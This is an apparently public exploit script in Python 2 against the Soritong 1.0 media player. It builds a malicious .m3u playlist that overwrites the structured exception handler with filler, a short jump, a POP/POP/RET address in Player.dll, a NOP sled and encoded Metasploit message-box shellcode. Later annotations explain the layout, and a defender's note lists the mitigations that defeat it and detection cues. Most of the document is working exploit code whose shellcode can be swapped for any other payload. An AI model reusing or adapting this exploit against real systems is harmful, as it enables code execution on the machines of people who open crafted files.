
@synap5e
Created November 10, 2012 21:23
Soritong 1.0 Client side exploit (SEH)
#!/usr/bin/python
# Python 2 script (uses the `file` builtin and byte-valued str literals,
# both gone in Python 3).
#
# Purpose: build one oversized .m3u playlist ("file.m3u", 30000 bytes) laid
# out so that, when parsed by the vulnerable player, its SEH record is
# overwritten (classic SEH-overwrite layout: filler, short jump, POP/POP/RET
# handler address, NOP sled, shellcode).
#
# Defender's note: the layout depends on a fixed handler address inside
# Player.dll, i.e. on that module being loaded at a predictable base without
# SafeSEH; SafeSEH/SEHOP, DEP and ASLR on current Windows builds break this
# pattern. Statically, a playlist this size that is almost entirely one
# repeated byte plus a run of 0x90 is a strong indicator for detection.
import os
# Soritong 1.0 Client side exploit (SEH)
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, EXITFUNC=thread, TITLE=Check, TEXT=Code
# Execution!, ICON=NO
# Badchars = '\x00\xff\x0a\x0d'
#
# Encoded 287-byte Metasploit message-box shellcode described in the header
# above; it only pops a dialog (proof of code execution), it is not a
# reverse shell.
payload = ("\xdb\xde\xbf\x60\xd0\x21\x8d\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
    "\x42\x83\xc5\x04\x31\x7d\x14\x03\x7d\x74\x32\xd4\x54\x9f\x29"
    "\xce\x13\x7b\xba\xc0\x09\x31\x35\x12\x67\x51\x31\x25\x47\x12"
    "\x33\xca\x2c\x52\xa0\x59\x74\x92\x53\x23\x59\x29\x55\xe4\xd6"
    "\x35\xef\xe7\xb0\x44\xde\xf7\xa2\x26\x6b\x6b\x01\x82\xe0\x31"
    "\x75\x41\xa2\x91\xfd\x54\xa1\x69\xb7\x4e\xbe\x34\x68\x6f\x2b"
    "\x2b\x5c\x26\x20\x98\x16\xb9\xd8\xd0\xd7\x88\xe4\xef\x84\x6e"
    "\x24\x7b\xd2\xaf\x6a\x89\xdd\xe8\x9e\x66\xe6\x8a\x44\xaf\x6c"
    "\x93\x0e\xf5\xaa\x52\xfa\x6c\x38\x58\xb7\xfb\x64\x7c\x46\x17"
    "\x13\x78\xc3\xe6\xcc\x09\x97\xcc\x10\x68\xdb\xbf\x21\x43\x0f"
    "\x36\xd4\x1a\x6d\x21\x99\x52\x7c\x5e\xf7\x82\x1f\x61\x07\xad"
    "\xa9\xdb\xfc\xea\x45\x2d\x1c\x6c\x1d\xae\xf9\x3e\xc9\x41\xfe"
    "\x41\xf6\xd7\x44\xb5\x61\x84\x2a\xe5\x30\x3c\x80\xd7\x9c\xd8"
    "\x8e\x62\x92\x45\x3d\x04\x08\xa2\xcb\x9d\x57\xfc\x34\xc8\x93"
    "\x88\x09\xa2\x20\x22\x2f\x0f\xeb\xb4\x2c\xab\x41\x53\x2d\x4c"
    "\x9a\x5c\xc6\xd9\x3d\x83\x37\x75\xfd\xab\x52\xe6\x30\xf7\x15"
    "\xb4\x16\x02\xaf\xa7\x3f\x63\xc1\x06\x98\x13\x7e\x3d\x6c\x8d"
    "\xe8\x9d\xc9\x35\x8c\xb5\x92\xaa\x2a\x20\x24\xfc\x3b\xe6\x62"
    "\xf1\xb2\x17\x5b\xdf\xaf\xe7\xcf\x8e\x7d\xf8\x20\x01\x42\x56"
    "\x3e\x37\x4a")
# NOTE: `buffer` shadows a Python 2 builtin; harmless here but poor style.
# 260 bytes of filler -- presumably the distance from the start of the
# playlist entry to the SEH record (offset not derivable from this file).
buffer = 'A' * 260
# Next-SEH slot: two NOPs and a short forward jump over the handler address.
buffer += "\x90\x90\xeb\x04"
# Handler slot: fixed POP/POP/RET address in Player.dll (see author's note).
buffer += '\xf8\x04\x01\x10' # Player.dll 0x100104f8 pop edi; pop esi; retn 0x0004
#this jumps us to 0x0012FC7C
# Short NOP sled, then the shellcode.
buffer += '\x90' * 20
buffer += payload
# Pad the file out to exactly 30000 bytes.
buffer += 'A' * (30000 - len(buffer))
name = "file.m3u"
# Replace any existing output file, then write the crafted playlist.
if os.path.exists(name):
    os.remove(name)
f = file(name, "w")
f.write(buffer)
f.close()